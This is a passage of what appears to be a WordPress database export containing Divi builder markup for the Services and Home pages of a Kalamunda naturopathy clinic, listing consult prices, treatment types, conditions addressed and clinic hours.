(60 min) - $185\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span>\n\n<span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span>\n\n<span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $90\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" width=\"100%\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express (20 min) - $65\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span>\nCapsules/tablets\nTeas\nTopical creams[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Kalamunda & online</span>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span>\n<span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span>\n<span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Services','','inherit','closed','closed','','424-revision-v1','','','2025-04-01 20:09:48','2025-04-01 12:09:48','',424,'https://verdenaturopathy.com.au/?p=435',0,'revision','',0),(440,1,'2025-04-01 20:25:03','2025-04-01 12:25:03','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span>\n<ul>\n <li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n <li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n <li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n <li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n <li><span style=\"font-family: Montserrat;\">treat the person as a whole</span></li>\n <li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<span style=\"font-family: Montserrat;\">We can support health in many conditions, including:</span>\n<ul>\n <li><span style=\"font-family: Montserrat;\">digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></li>\n <li><span style=\"font-family: Montserrat;\">nervous system imbalance (anxiety, low mood, stress, poor sleep, emotional imbalance)</span></li>\n <li><span style=\"font-family: Montserrat;\">metabolic dysfunction (insulin resistance)</span></li>\n <li><span style=\"font-family: Montserrat;\">immune dysfunction (autoimmunity, recurrent infections)</span></li>\n <li><span style=\"font-family: Montserrat;\">thyroid conditions (hyper/hypothyroidism)</span></li>\n <li><span style=\"font-family: Montserrat;\">women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance, infertility)</span></li>\n <li><span style=\"font-family: Montserrat;\">skin health (acne, eczema/dermatitis, rosacea)</span></li>\n <li><span style=\"font-family: Montserrat;\">cardiovascular health (chronic inflammation, high cholesterol)</span></li>\n <li><span style=\"font-family: Montserrat;\">men\'s health (prostate issues, sexual health)</span></li>\n <li><span style=\"font-family: Montserrat;\">children\'s health (poor immunity, digestive issues, behavioural issues)</span></li>\n</ul>\n<span style=\"font-family: Montserrat;\">Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span>\n\n<span style=\"font-family: Montserrat;\">We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Kalamunda & online</span>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span>\n<span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span>\n<span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2025-04-01 20:25:03','2025-04-01 12:25:03','',28,'https://verdenaturopathy.com.au/?p=440',0,'revision','',0),(458,1,'2025-04-09 21:02:00','2025-04-09 13:02:00','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" overflow-x=\"hidden\" overflow-y=\"hidden\" custom_padding=\"||0px|||\" hover_enabled=\"0\" locked=\"off\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Naturopathic consults</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset2\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial (60 min) - $185\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span>\n\n<span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span>\n\n<span style=\"font-family: Montserrat;\">Pathology testing or referrals may be 